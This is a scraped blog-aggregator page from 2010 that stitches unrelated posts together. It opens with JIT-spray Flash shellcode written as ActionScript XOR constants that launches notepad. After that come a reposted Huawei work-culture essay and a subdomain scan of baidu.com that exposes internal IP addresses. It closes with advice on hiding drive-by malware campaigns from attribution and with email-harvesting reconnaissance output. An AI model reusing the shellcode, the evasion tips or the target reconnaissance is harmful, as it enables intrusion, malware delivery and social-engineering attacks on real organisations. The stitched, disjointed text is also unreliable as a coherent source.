# Title: JITed exec notepad shellcode
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Alexey Sintsov
# Published:
# Verified: yes
# Download N/A

// JIT.swf
//
// By Alexey Sintsov
// dookie@inbox.ru
// a.sintsov@dsec.ru
//
// DSecRG - Digital Security Research Group [dsecrg.com]
//
// PEB-DLL-System()-notepad
//

package {
import flash.display.MovieClip
public class Main extends MovieClip
{
function funcXOR1()
{
var jit=(0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c909090^
0x3c90C033^
0x3c9030b0^
0x3c008b64^
0x3c0c408b^
0x3c1c408b^
0x3c08508b^
0x3c20788b^
0x3c90008b^
0x6a6d3f80^
0x3c90eA75^
0x3c904747^
0x6a733f80^
0x3c90ef75^
0x3c904747^
0x6a763f80^
0x3c90ef75^
0x3c904747^
0x6a633f80^
0x3c90ef75^
0x3c529090^
0x3c3cc283^
0x3c903a8b^
0x3c24148b^
0x3c90d703^
0x3c78c283^
0x3c903a8b^
0x3c24148b^
0x3c90d703^
0x3c18c283^
0x3c903a8b^
0x3c04c283^
0x3c901a8b^
0x3c241c03^
0x3c04c283^
0x3c90328b^
0x3c243403^
0x3c04c283^
0x3c900a8b^
0x3c240c03^
0x3cb89090^
0x3c900000^
0x3c9065b0^
0x3c906db4^
0x3c905090^
0x3cb89090^
0x3c907473^
0x3c9073b0^
0x3c9079b4^
0x3c905090^
0x3c90d78b^
0x3c90ff33^
0x3c90C033^
0x3c535156^
0x14909090^
0x3c909090^
0x3c574790^
0x3c90C033^
0x3c24048b^
0x3c02e0c1^
0x3c90f003^
0x3c90068b^
0x3c18c483^
0x3c240403^
0x3c18ec83^
0x3c90c933^
0x3c9006b1^
0x3c10c483^
0x3c90f48b^
0x3c90f88b^
0x3c10c483^
0x6a90a6f3^
0x14901474^
0x3c1cec83^
0x3c595b5f^
0x3c90905e^
0x3c908beb^
0x3c1cec83^
0x3c595b5f^
0x3c90905e^
0x3c90e7d1^
0x3c90cf03^
0x3c90c033^
0x3c018b66^
0x3c02e0c1^
0x3c90c303^
0x3c90188b^
0x3c08c483^
0x3c241c03^
0x646170B8^
0x000000b9^
0x3C50c12b^
0x00B89090^
0x3c906574^
0x3c906fb4^
0x3C506eb0^
0x3cd3ff54^
0x3ccccccc);

return jit;

}

function Main()
{
var ret1=funcXOR1();
}
}
}


-------
再补一个
阅读全文
类别:编程相关 查看评论
Posted by ShadowHider at Wed, 10 Mar 2010 19:39:00 +0800
转载2006年公司报纸的一篇文章,给即将加入我们的同学们

////////////////////////////////////////////////////////////////////////////////////////////

华为正处在一个关键的发展时期,我们已经连续数年大量招收新员工,壮大队伍。新员工进入华为,第一眼看到的、处处感受到的就是华为的艰苦奋斗。一些人对此感到不理解。他们会提出这样的问题:华为为什么要艰苦奋斗?回答这个问题涉及到另一个根本的问题,那就是:华为为什么能活到今天?华为将来靠什么活下去?我们今天就来讨论一下这个问题。

1、不奋斗,华为就没有出路

世间管理比较复杂困难的是工业,而工业中最难管理的是电子工业。电子工业有别于传统产业的发展规律,它技术更替、产业变化迅速,同时,没有太多可以制约它的自然因素。例如汽车产业的发展,受钢铁、石油资源以及道路建设的制约。而用于电子工业的生产原料是取之不尽的河沙、软件代码、数学逻辑。正是这一规律,使得信息产业的竞争要比传统产业更激烈,淘汰更无情,后退就意味着消亡。要在这个产业中生存,只有不断创新和艰苦奋斗。而创新也需要奋斗,是思想上的艰苦奋斗。华为由于幼稚不幸地进入了信息产业,我们又不幸学习了电子工程,随着潮流的波逐,被逼上了不归路。创业者和继承者都在消蚀着自己,为企业生存与发展顽强奋斗,丝毫不敢懈怠!一天不进步,就可能出局;三天不学习,就赶不上业界巨头,这是严酷的事实。

华为在IT泡沫破灭后侥幸活下来,其实是我们当时的落后救了我们,落后让我们没能力盲目地追赶技术驱动的潮流。而现在西方公司已经调整过来,不再盲目地追求技术创新,而是转变为基于客户需求导向的创新,我们再落后就死无葬身之地。信息产业正逐步转变为低毛利率、规模化的传统产业。电信设备厂商已进行和将进行的兼并、整合正是为了应对这种挑战。华为相对还很弱小,面临更艰难的困境。要生存和发展,没有灵丹妙药,只能用在别人看来很“傻”的办法,就是艰苦奋斗。华为不战则亡,没有退路,只有奋斗才能改变自己的命运。

有一篇文章叫《不眠的硅谷》,讲述了美国高科技企业集中地硅谷的艰苦奋斗情形,无数硅谷人与时间赛跑,度过了许多不眠之夜,成就了硅谷的繁荣,也引领了整个电子产业的节奏。华为也是无数的优秀儿女贡献了青春和热血,才形成今天的基础。创业初期,我们的研发部从五、六个开发人员开始,在没有资源、没有条件的情况下,秉承六十年代“两弹一星”艰苦奋斗的精神,以忘我工作、拼搏奉献的老一辈科技工作者为榜样,大家以勤补拙,刻苦攻关,夜以继日地钻研技术方案,开发、验证、测试产品设备……,没有假日和周末,更没有白天和夜晚,累了就在垫子上睡一觉,醒来接着干,这就是华为“垫子文化”的起源。虽然今天垫子已只是用来午休,但创业初期形成的“垫子文化”记载的老一代华为人的奋斗和拼搏,是我们需要传承的宝贵的精神财富。

华为走到今天,在很多人眼里看来已经很大了、成功了。有人认为创业时期形成的“垫子文化”、奋斗文化已经不合适了,可以放松一些,可以按部就班,这是危险的。繁荣的背后,都充满危机,这个危机不是繁荣本身必然的特性,而是处在繁荣包围中的人的意识。艰苦奋斗必然带来繁荣,繁荣后不再艰苦奋斗,必然丢失繁荣。“千古兴亡多少事,不尽长江滚滚来”,历史是一面镜子,它给了我们多么深刻的启示。我们还必须长期坚持艰苦奋斗,否则就会走向消亡。当然,奋斗更重要的是思想上的艰苦奋斗,时刻保持危机感,面对成绩保持清醒头脑,不骄不躁。

艰苦奋斗是华为文化的魂,是华为文化的主旋律,我们任何时候都不能因为外界的误解或质疑动摇我们的奋斗文化,我们任何时候都不能因为华为的发展壮大而丢掉了我们的根本――艰苦奋斗。

2、公司高层管理团队和全体员工的共同付出和艰苦奋斗铸就了华为

中国高科技企业的成长之路注定充满坎坷与荆棘。选择了这条道路的人生注定艰辛与劳碌,同时也更有价值。

在中国,在高技术领域做一个国际化的企业、开拓全球市场,我们没有任何经验可以借鉴,完全靠摸索,在市场中摸爬滚打,在残酷的竞争中学习;

在中国,做一个以几万年轻知识分子为主的企业,竞争又是全球范围和世界级水平,我们没有任何成功的实践可以借鉴;

在中国,做一个企业,竞争对手是全球各发达国家的世界级巨子,他们有几十年甚至近百年的积累,有欧美数百年以来发展形成的工业基础和产业环境,有世界发达国家的商业底蕴和雄厚的人力资源和社会基础,有世界一流的专业技术人才和研发体系,有雄厚的资金和全球著名的品牌,有深厚的市场地位和客户基础,有世界级的管理体系和运营经验,有覆盖全球客户的庞大的营销和服务网络。面对这样的竞争格局,面对如此的技术及市场壁垒,在中国,我们没有任何经验可以借鉴。

华为没有背景,也不拥有任何稀缺的资源,更没有什么可依赖的,除了励精图治、开放心胸、自力更生,我们还有什么呢?最多再加一个艰苦奋斗,来缩短与竞争对手的差距。公司高层管理团队和全体员工的共同付出和艰苦奋斗,铸就了今天的华为。

我们在GSM上投入了十几亿研发经费,多少研发工程师、销售工程师为之付出了心血、努力、汗水和泪水。在1998年我们就获得了全套设备的入网许可证,但打拼了八年,在国内无线市场上仍没有多少份额,连成本都收不回来。2G的市场时机已经错过了,我们没有喘息,没有停下来,在3G上又展开了更大规模的研发和市场开拓,每年近十亿元的研发投入,已经坚持了七~八年,因为收不回成本,华为不得不到海外寻找生存的空间……

自创立那一天起,我们历经千辛万苦,一点一点地争取到订单和农村市场;另一方面我们把收入都拿出来投入到研究开发上。当时我们与世界电信巨头的规模相差200倍之多。通过一点一滴锲而不舍的艰苦努力,我们用了十余年时间,终于在2005 年,销售收入首次突破了50亿美元,但与通信巨头的差距仍有好几倍。最近不到一年时间里,业界几次大兼并:爱立信兼并马可尼,阿尔卡特与朗讯合并、诺基亚与西门子合并,一下子使已经缩小的差距又陡然拉大了。我们刚指望获得一些喘息,直一直腰板,拍打拍打身上的泥土,没想到又要开始更加漫长的艰苦跋涉……

华为茫然中选择了通讯领域,是不幸的,这种不幸在于,所有行业中,实业是最难做的,而所有实业中,电子信息产业是最艰险的;这种不幸还在于,面对这样的挑战,华为既没有背景可以依靠,也不拥有任何资源,因此华为人尤其是其领导者将注定为此操劳终生,要比他人付出更多的汗水和泪水,经受更多的煎熬和折磨。唯一幸运的是,华为遇上了改革开放的大潮,遇上了中华民族千载难逢的发展机遇。公司高层领导虽然都经历过公司最初的岁月,意志上受到一定的锻炼,但都没有领导和管理大企业的经历,直至今天仍然是战战兢兢,诚惶诚恐的,因为十余年来他们每时每刻都切身感悟到做这样的大企业有多么难。多年来,唯有更多身心的付出,以勤补拙,牺牲与家人团聚、自己的休息和正常的生活,牺牲了平常人都拥有的很多的亲情和友情,消蚀了自己的健康,经历了一次又一次失败的沮丧和受挫的痛苦,承受着常年身心的煎熬,以常人难以想象的艰苦卓绝的努力和毅力,才带领大家走到今天。

十八年来,公司高层管理团队夜以继日的工作,有许多高级干部几乎没有什么节假日,24小时不能关手机,随时随地都在处理随时发生的问题。现在,更因为全球化后的时差问题,总是夜里开会。我们没有国际大公司积累了几十年的市场地位、人脉和品牌,没有什么可以依赖,只有比别人更多一点奋斗,只有在别人喝咖啡和休闲的时间努力工作,只有更虔诚对待客户,否则我们怎么能拿到订单?

为了能团结广大员工一起奋斗,公司创业者和高层领导干部不断地主动稀释自己的股票,以激励更多的人才加入到这从来没有前人做过和我们的先辈从未经历过的艰难事业中来,我们一起追寻着先辈世代繁荣的梦想,背负着民族振兴的希望,一起艰苦跋涉。公司高层领导的这种奉献精神,正是用自己生命的微光,在茫茫黑暗中,带领并激励着大家艰难地前行,无论前路有多少困难和痛苦,有多少坎坷和艰辛。

中国是世界上最大的新兴市场,因此,世界巨头都云集中国,公司创立之初,就在自己家门口碰到了全球最激烈的竞争,我们不得不在市场的狭缝中求生存;当我们走出国门拓展国际市场时,放眼一望,所能看得到的良田沃土,早已被西方公司抢占一空,只有在那些偏远、动乱、自然环境恶劣的地区,他们动作稍慢,投入稍小,我们才有一线机会。为了抓住这最后的机会,无数优秀华为儿女离别故土,远离亲情,奔赴海外,无论是在疾病肆虐的非洲,还是在硝烟未散的伊拉克,或者海啸灾后的印尼,以及地震后的阿尔及利亚……,到处都可以看到华为人奋斗的身影。我们有员工在高原缺氧地带开局,爬雪山,越丛林,徒步行走了8天,为服务客户无怨无悔;有员工在国外遭歹徒袭击头上缝了三十多针,康复后又投入工作;有员工在飞机失事中幸存,惊魂未定又救助他人,赢得当地政府和人民的尊敬;也有员工在恐怖爆炸中受伤,或几度患疟疾,康复后继续坚守岗位;我们还有三名年轻的非洲籍优秀员工在出差途中飞机失事不幸罹难,永远地离开了我们……

十八年的历程,十年的国际化,伴随着汗水、泪水、艰辛、坎坷与牺牲,我们一步步艰难地走过来了,面对漫漫长征路,我们还要坚定地走下去。

3、虔诚地服务客户是华为存在的唯一理由

还记得,经历90年代初艰难的日子,在资金技术各方面都匮乏的条件下,咬牙把鸡蛋放在一个篮子里,紧紧依靠集体奋斗,群策群力,日夜攻关,利用压强原则,重点突破,我们终于拿出了自己研制的第一台通讯设备――数字程控交换机。1994 年,我们第一次参加北京国际通讯展,在华为展台上,“从来就没有救世主,也不靠神仙皇帝,要创造新的生活,全靠我们自己”这句话非常地与众不同,但对华为员工来讲,这正是当时的真实写照。

设备刚出来,我们很兴奋,又很犯愁,因为业界知道华为的人很少,了解华为的人更少。当时有一个情形,一直深深地印在老华为人的脑海,经久不褪:在北京寒冬的夜晚,我们的销售人员等候了八个小时,终于等到了客户,但仅仅说了半句话:“我是华为的……”,就眼睁睁地看着客户被某个著名公司接走了。望着客户远去的背影,我们的小伙子只能在深夜的寒风中默默地咀嚼着屡试屡败的沮丧和屡败屡战的苦涩:是啊,怎么能怪客户呢?华为本来就没有几个人知晓啊。

由于华为人废寝忘食地工作,始终如一虔诚地对待客户,华为的市场开始起色了,友商看不到华为这种坚持不懈的艰苦和辛劳,产生了一些误会和曲解,不能理解华为怎么会有这样的进步。还是当时一位比较了解实情的官员出来说了句公道话:“华为的市场人员一年内跑了500个县,而这段时间你们在做什么呢?”当时定格在人们脑海里的华为销售和服务人员的形象是:背着我们的机器,扛着投影仪和行囊,在偏僻的路途上不断地跋涉……。

在《愚公移山》中,愚公整天挖山不止,还带着他的儿子、孙子不停地挖下去,终于感动了上帝,把挡在愚公家前的两座山搬走了。在我们心里面一直觉得这个故事也非常形象地描述了华为十八年来,尤其是90年代初中期和海外市场拓展最困难时期的情形:是我们始终如一对待客户的虔诚和忘我精神,终于感动了“上帝”,感动了我们的客户! 无论国内还是海外,客户让我们有了今天的一些市场,我们永远不要忘本,永远要以宗教般的虔诚对待我们的客户,这正是我们奋斗文化中的重要组成部分。

进入海外市场,我们的差异化优势主要是满足客户需求比较快(比如泰国AIS,我们因为比友商项目实施周期快3倍,才获得了服务AIS的机会)。因此,海外合同要么交付要求比较急,要么需求特殊,需定制开发,研发、用服、供应链等只有赶时间、抢进度,全力以赴才能抓住市场机会。

在资金缺乏、竞争激烈的独联体市场,华为人忍辱负重、默默耕耘了10年,从获得第一单38美元的合同起,集腋成裘,到2005年销售额6亿美元,成为公司重要的市场。在要求严格的欧洲市场,经历三年的认证,我们终于通过了BT的考试,成为BT重要合作伙伴;为获得中东某电信运营商的认可,面对世界级电信设备商的竞争,我们冒着室外60度的高温进行现场作业,长达数月,靠着全心全意为客户服务的诚意,经过2年多的坚持不懈,终于开通了我们全球第一个3G商用局……

经过十几年的不懈奋斗和挣扎,我们取得了一点成绩。这里要感谢长期支持华为的客户,没有客户的支持、信任和压力,就没有华为的今天。客户对我们的信任,是依靠华为不断地艰苦奋斗得来的。现在我们的客户也在不断地进步,来自客户需求的压力越来越大,我们没有理由停下来歇一歇,必须更加努力,来回报客户对我们的信任。

4、天道酬勤,幸福的生活要靠劳动来创造

大多数华为员工来自山区、乡村和城镇,许多人在童年和少年时代都体会到生活的艰辛。父母在他们那个年代和环境里努力用他们的付出,把我们抚养大,从他们身上,我们知道了生活的含义,领悟到了我们现在身上的责任。我们用自己劳动收获寄回了孝敬父母的第一笔钱,虽然可能微薄,但其中的滋味难以言述,就像我们第一次拿到海外的合同一样,从心底里舒畅、宽慰和喜悦。当我们自己成为了父母,看着我们的小孩由于我们劳动的付出而能够那么安详地吮吸着生命的乳汁,露出香甜而无忧无虑的睡容,听着老奶奶讲着古老的传说,互相分享着格林的童话,尽情地享受着天真而稚趣的童年……我们有一种从未有过的幸福和神圣的责任感。

我们的劳动不仅改变了人们的生活,增进了人们的沟通,而且也一天一天地充实着我们自己,丰实着我们家人的生活,也在一年一年地改变我们自己的生活。我们在分享劳动果实的同时,又增加了对未来的憧憬,这些在慢慢地加深着我们对劳动本身的体悟和认识。热爱劳动不仅仅是一种美德,劳动中的人也是美的,在劳动中品尝到一种愉悦甚至幸福。当看着我们贫瘠的土地变成了绿洲,当看着事先连想都不会想像到的、代表着现代文明的成果在我们勤劳的双手中不断地创造出来时,这种心情是无论用什么语言都难以表达的,真可谓天道酬勤,一份耕耘,一份收获。

拼搏的路虽然艰苦,但苦中有乐,乐在其中。当复杂的3G网络芯片一次投片成功时;当新机器打通电话,机器上的信号灯如繁星般闪烁时;当我们翻山越岭,克服高原缺氧,为西藏最后一个不通电话的墨脱县实现了通话,藏族同胞载歌载舞,献上洁白的哈达时,我们为之欢呼雀跃,欢乐抚平了多少个日日夜夜的奋斗在我们额头上刻下的皱纹。我们使最封闭的山村一步跨入了现代文明世界,使世代穷苦的村民借助现代通信手段改变了自己的命运。即便是我们为某个非洲国家安装通信网络设备而长途颠簸,顶着赤道的烈日,走戈壁,穿沙漠,但这种经历未必不是一种值得津津乐道的人生体验,更不要说非洲小男孩,有生第一次通过我们的无线网络与外部世界通话时脸上欢快而惊奇的表情,那时我们心头洋溢着的是自豪与喜悦。

一代一代的华为人,他们是敬业的,又是乐观向上的,这种乐观不仅表现在工作生活上,还表现在对待困难和压力上。是什么支撑着他们?正如一位员工所说:“是因为心中有爱。这个爱,不仅表现在对客户、同事和家人的关爱、真诚上,也表现在对祖国、对公司的热爱与忠诚上。

奋斗就是付出,付出了才会有回报。多年来我们秉承不让雷锋吃亏的理念,建立了一套基本合理的评价机制,并基于评价给予激励回报。公司视员工为宝贵的财富,尽力为员工提供了好的工作、生活、保险、医疗保健条件,为员工提供业界有竞争力的薪酬,员工的回报基于岗位责任的绩效贡献。

公司创业之初,根本没有资金,是创业者们把自己的工资、奖金投入到公司,每个人只能拿到很微薄的报酬,绝大部分干部、员工长年租住在农民房,正是老一代华为人“先生产,后生活”的奉献,才挺过了公司最困难的岁月,支撑了公司的生存、发展,才有了今天的华为。当年他们用自己的收入购买了公司的内部虚拟股,到今天获得了一些投资收益,这是对他们过去奉献的回报。我们要理解和认同,因为没有他们当时的冒险投入和艰苦奋斗,华为不可能生存下来。我们感谢过去、现在与公司一同走过来的员工,他们以自己的泪水和汗水奠定了华为今天的基础。更重要的是,他们奠定与传承了公司优秀的奋斗和奉献文化,华为的文化将因此生生不息,代代相传。

为了适应未来的发展,我们正在推行人力资源变革。这次人力资源管理变革的目的是为了要建立一支宏大的,能英勇奋斗,不畏艰难困苦,能创造成功的干部员工队伍。我们将推行“以岗定级、以级定薪、人岗匹配、易岗易薪”的工资制度改革,实行基于岗位责任和贡献的报酬体系,为更多新人的成长创造空间。任何员工,无论新老,都需奋斗。从高层管理团队到每个基层员工,只有保持不懈怠的状态,华为才能活着走向明天。

5、戒骄戒躁,继续艰苦奋斗

2002年12月6日,胡锦涛总书记在西柏坡发表的重要讲话中谈到,“中华民族历来以勤劳勇敢、不畏艰苦著称于世。我们的古人早就讲过,‘艰难困苦,玉汝于成 , ‘居安思危,戒奢以俭 ,‘忧劳兴国,逸豫亡身,‘生于忧患,死于安乐,等等。这些警世名言,今天对我们依然有着重要的启示作用。历史和现实都表明,一个没有艰苦奋斗精神作支撑的民族,是难以自立自强的;一个没有艰苦奋斗精神作支撑的国家,是难以发展进步的;一个没有艰苦奋斗精神做支撑的政党,是难以兴旺发达的。”

同样,一个没有艰苦奋斗精神作支撑的企业,也是难以长久生存的。而我们现在有些干部、员工,沾染了娇骄二气,开始乐道于享受生活,放松了自我要求,怕苦怕累,对工作不再兢兢业业,对待遇斤斤计较,这些现象大家必须防微杜渐。不能改正的干部,可以开个欢送会。全体员工都可以监督我们队伍中是否有人(尤其是干部)懈怠了,放弃了艰苦奋斗的优良传统,特别是对我们高层管理者。我们要更多地寻找那些志同道合、愿意与我们一起艰苦奋斗的员工加入我们的队伍。我们要唤醒更多的干部员工认识到艰苦奋斗的重要意义,以艰苦奋斗为荣。

我们要勤奋,但也巧干。这就是要通过坚持不懈的管理改进和能力提升,提高我们的工作效率和人均效益。这些年来,公司一直在流程、组织、IT建设等方面持续地变革和优化,努力推动管理改进,但与西方友商相比,在全球化管理体系的成熟度上,在管理者自身经验和能力上,我们仍然有着明显的差距。我们从青纱帐里出来,还来不及取下头上包着的白毛巾,一下子就跨过了太平洋;腰间还挂着地雷,手里提着盒子h,一下子就掉进了TURNKEY工程的大窟窿里……,我们还无法做到把事情一次做正确,很多工作来不及系统思考就被迫匆匆启动。

管理效率的低下,也造成了我们压力大、负荷重。面对国际化的残酷竞争,我们必须提升对未来客户需求和技术趋势的前瞻力,未雨绸缪,从根本上扭转我们作为行业的后进入者所面临的被动挨打局面;我们必须提升对客户需求理解的准确性,提高打中靶心的成功率,减少无谓的消耗;我们还要加强前端需求的管理,理性承诺,为后端交付争取到宝贵的作业时间,减少不必要的急行军;我们要提升在策划、技术、交付等各方面的基础积累,提升面对快速多变的市场的准备度和响应效率。我们做任何事情都有好的策划,谋定而后动,要善于总结经验教训并在组织内传播共享。

我们的管理者,特别是大批年轻的基层管理者,要努力提升自身的管理能力,加强学习,积累管理经验。对事的管理上,要做好计划,要合理分配工作,合理规划工作节奏,张驰有度,攻下一个山头后,团队要注意适当休整、认真总结。在对人的管理上,要加强对下属的关心和爱护,多一些沟通和辅导,润物无声,帮助下属提高技能和效率,培养工作中的自信心、成就感。

05年春节晚会上,《千手观音》给了我们很大震撼。那些完全听不到声音,也许一生都不知道什么是声音的孩子,竟然能形成那么整齐划一的动作,那么精美绝伦的演出,其中的艰辛和付出可想而知。华为数万名员工,正同他们一样,历经千辛万苦,才取得今天一点进步。但我们始终认为华为还没有成功,华为的国际市场刚刚有了起色,所面临的外部环境比以往更严峻。全球超过10亿用户使用华为的产品和服务,我们已经进入了100多个国家,海外很多市场刚爬上滩途,随时会被赶回海里;网络和业务在转型,客户需求正发生深刻变化,产业和市场风云变幻,刚刚积累的一些技术和经验又一次面临自我否定。在这历史关键时刻,我们决不能分心,不能动摇,不能因为暂时的挫折、外界的质疑,动摇甚至背弃自己的根本,否则,我们将自毁
长城,全体员工十八年的辛勤劳动就会被付之东流。无论过去、现在、还是将来,我们都要继续保持艰苦奋斗的作风。

一个中国高科技企业,在海外开拓的征途中,注定是艰难的,但意义也将是非同寻常的。

幸福不会从天降,全靠我们来创造,天道酬勤。 阅读全文
类别:默认分类 查看评论
Posted by catspar at Wed, 10 Mar 2010 19:09:00 +0800
今天无聊的时候看了下,还有不少域名是在内网的。

abc.baidu.com
IP address #1: 119.75.216.20
IP address #2: 119.75.213.61

act.baidu.com
IP address #1: 220.181.37.179

adm.baidu.com
IP address #1: 220.181.50.110

agf.baidu.com
IP address #1: 220.181.38.105

alb.baidu.com
IP address #1: 220.181.37.145

aos.baidu.com
IP address #1: 10.23.254.79
[+] warning: internal IP address disclosed

api.baidu.com
IP address #1: 220.181.50.35

asp.baidu.com
IP address #1: 220.181.37.138

bar.baidu.com
IP address #1: 220.181.6.89
IP address #2: 220.181.6.87

bbs.baidu.com
IP address #1: 220.181.43.120
IP address #2: 220.181.38.80

bid.baidu.com
IP address #1: 220.181.38.105

bit.baidu.com
IP address #1: 10.23.241.249
[+] warning: internal IP address disclosed

box.baidu.com
IP address #1: 220.181.38.82

bpm.baidu.com
IP address #1: 10.65.21.15
[+] warning: internal IP address disclosed

can.baidu.com
IP address #1: 220.181.37.154

cas.baidu.com
IP address #1: 220.181.50.39

ccp.baidu.com
IP address #1: 10.23.240.233
[+] warning: internal IP address disclosed

cms.baidu.com
IP address #1: 10.23.3.58
[+] warning: internal IP address disclosed

com.baidu.com
IP address #1: 10.23.1.162
[+] warning: internal IP address disclosed

csm.baidu.com
IP address #1: 220.181.5.146

csr.baidu.com
IP address #1: 220.181.38.105

dao.baidu.com
IP address #1: 220.181.6.184
IP address #2: 220.181.6.81

dbd.baidu.com
IP address #1: 220.181.3.60

deb.baidu.com
IP address #1: 10.32.10.94
[+] warning: internal IP address disclosed

dns.baidu.com
IP address #1: 202.108.22.220

doc.baidu.com
IP address #1: 220.181.50.113

dsp.baidu.com
IP address #1: 172.16.1.112
[+] warning: internal IP address disclosed

dzl.baidu.com
IP address #1: 220.181.6.89
IP address #2: 220.181.6.87

ebs.baidu.com
IP address #1: 10.23.3.56
[+] warning: internal IP address disclosed

edu.baidu.com
IP address #1: 220.181.6.81
IP address #2: 220.181.6.184

eiv.baidu.com
IP address #1: 220.181.38.74

ent.baidu.com
IP address #1: 220.181.37.144

erp.baidu.com
IP address #1: 10.23.3.70
[+] warning: internal IP address disclosed

frd.baidu.com
IP address #1: 220.181.37.156

gov.baidu.com
IP address #1: 220.181.6.184
IP address #2: 220.181.6.81

han.baidu.com
IP address #1: 220.181.37.135

hbs.baidu.com
IP address #1: 220.181.3.110

hhc.baidu.com
IP address #1: 220.181.3.111

hsm.baidu.com
IP address #1: 220.181.38.105

iit.baidu.com
IP address #1: 10.81.7.172
[+] warning: internal IP address disclosed

img.baidu.com
IP address #1: 220.181.6.68
IP address #2: 220.181.6.69

imo.baidu.com
IP address #1: 220.181.50.115

ivr.baidu.com
IP address #1: 202.108.23.186

kid.baidu.com
IP address #1: 220.181.6.81
IP address #2: 220.181.6.184

law.baidu.com
IP address #1: 220.181.38.124

lic.baidu.com
IP address #1: 220.181.37.178

log.baidu.com
IP address #1: 10.23.2.9
[+] warning: internal IP address disclosed

mad.baidu.com
IP address #1: 220.181.37.190

map.baidu.com
IP address #1: 220.181.37.201

mkt.baidu.com
IP address #1: 220.181.37.179

mms.baidu.com
IP address #1: 119.75.216.20
IP address #2: 119.75.213.61

msg.baidu.com
IP address #1: 220.181.38.118

nlp.baidu.com
IP address #1: 10.81.7.154
[+] warning: internal IP address disclosed

nps.baidu.com
IP address #1: 10.23.251.5
[+] warning: internal IP address disclosed

pda.baidu.com
IP address #1: 220.181.107.164

pdc.baidu.com
IP address #1: 220.181.37.204

pic。百度。com(这个域baidu居然不让发,真是很奇怪!)
IP address #1: 220.181.50.118

pop.baidu.com
IP address #1: 220.181.38.249

ren.baidu.com
IP address #1: 220.181.37.219

roi.baidu.com
IP address #1: 220.181.38.105

sdc.baidu.com
IP address #1: 10.23.1.162
[+] warning: internal IP address disclosed

sem.baidu.com
IP address #1: 220.181.37.90

sms.baidu.com
IP address #1: 10.23.199.131
[+] warning: internal IP address disclosed

sop.baidu.com
IP address #1: 10.65.7.30
[+] warning: internal IP address disclosed

svn.baidu.com
IP address #1: 172.22.1.15
[+] warning: internal IP address disclosed

top.baidu.com
IP address #1: 220.181.37.140

utk.baidu.com
IP address #1: 220.181.38.75

uui.baidu.com
IP address #1: 10.23.241.236
[+] warning: internal IP address disclosed

vod.baidu.com
IP address #1: 220.181.38.81

wap.baidu.com
IP address #1: 220.181.107.164

win.baidu.com
IP address #1: 10.65.19.212
[+] warning: internal IP address disclosed

www.baidu.com
IP address #1: 119.75.213.61
IP address #2: 119.75.216.20

you.baidu.com
IP address #1: 10.81.7.172
[+] warning: internal IP address disclosed 阅读全文
类别:象牙塔 查看评论
Posted by axis at Wed, 10 Mar 2010 17:39:00 +0800

F-secure说PDF"钓鱼"很火爆


(PDF Based Targeted Attacks are Increasing)


类别:Vulnerability 查看评论
Posted by sowhat at Wed, 10 Mar 2010 14:28:00 +0800
    这个月的补丁非常的有意思,咋一看以为是加拿大的华人在灌水,结果Credit出来发现不是。而且这个月终于出来一个正儿八经能用的,看微软的公告就可以知道,CVE-2010-0263是引用未初始化内存,Excel本身支持spray些东西出来,所以不排除运气特别好的时候,这个东西能够捆个马什么的。鉴于市面上貌似没有见到过类似的东西,所以比较有可能的是样本最早卖给了ZDI,然后ZDI给了微软。
    今天微软还有一个公告是关于CVE-2010-0806,这个在.3322.org和.xxoo.info的都有见到过,且宿主都是中文的win2k3。有传言说这个和某个excel2007的洞来自同一个地方,但是看风格上,这个更像是某批量生产线上出来的。说起这个插句题外话,aurora这种是好洞,可惜外面流行的样本比较遗憾,其实国内搞利用牛的人一堆一堆,当用得不想用了准备露出来群发时前,就像这个CVE-2010-0806,可以发给比较有经验的人,例如友情链接里面的一些圣手或者wordexx他们,指不定还能够起死回生。
    说起这个就多讲两句肺腑之言,关于挂马,knownsec和很黑医生有相当多的技巧。有些已经公开的,比如用些事件触发啊、圈天前面弄几个挡箭牌啊、shellcode不要直接下载执行啊,有必要用的时候还是用用。直接搞个win2k3拨vpn出去,环境啥的都不检测就裸奔,而且还是个中文系统,人家很容易就找回到蓝翔厨师学校了。还有就是御用茶壶里面刻工匠名字,强烈建议有心人什么时候收集下做个ExpID.exe,因为貌似这个也挺反映地域文化的。 阅读全文
类别:默认分类 查看评论
Posted by swan at Wed, 10 Mar 2010 14:27:00 +0800
在看了nexus one 的 Nexus One The Story.
忍不住了.终于下决心要了.

类别:Other 查看评论
Posted by evil0x86 at Wed, 10 Mar 2010 12:40:00 +0800

渗透过程中得到更多的信息是成功的基础,而目标账户/邮件的信息收集是一个重要的步骤,通过得到这些可以实施社会工程学攻击,当然也可以暴力破解。我们可以手动的去完成,也可以借助一些辅助的脚本、工具,如theHarvester和MSF3。

Edge-Security's theHarvester

Metasploit's search_email_collector.rb

两个小工具通过google和必应来进行快速的账户信息收集

zombie@haktop:/tools/email/theHarvester# ./theHarvester.py -d defcon.com -b google -l 500

*************************************

*TheHarvester Ver. 1.5 *

*Coded by Christian Martorella *

*Edge-Security Research *

*cmartorella@edge-security.com *

*************************************

Searching for defcon.com in google :

======================================


Total results: 462000

Limit: 500

Searching results: 0

Searching results: 100

Searching results: 200

Searching results: 300

Searching results: 400

Accounts found:

====================

quietpro@defcon.com

nick.s@defcon.com

robert@defcon.com

lynne@defcon.com

@defcon.com

joe@defcon.com

info@defcon.com

dtangent@defcon.com

====================

Running MSF search_email_collector...

[*] Please wait while we load the module tree...
[*] Harvesting emails .....
[*] Searching Google for email addresses from defcon.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from defcon.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from defcon.com
[*] Extracting emails from Yahoo search results...
[*] Located 7 email addresses for defcon.com
[*]     headsets@defcon.com
[*]     info@defcon.com
[*]     jobs@defcon.com
[*]     nick.s@defcon.com
[*]     nick@defcon.com
[*]     robert@defcon.com
[*]     spr@defcon.com

========================================================================

#!/bin/bash

echo "Running MSF search_email_collector..."
echo
ruby /pentest/exploits/framework3/msfcli auxiliary/gather/search_email_collector DOMAIN=$1 OUTFILE=$1_emails.txt E
echo
echo "Running theHarvester on Google, BING, MSN, PGP..."
echo
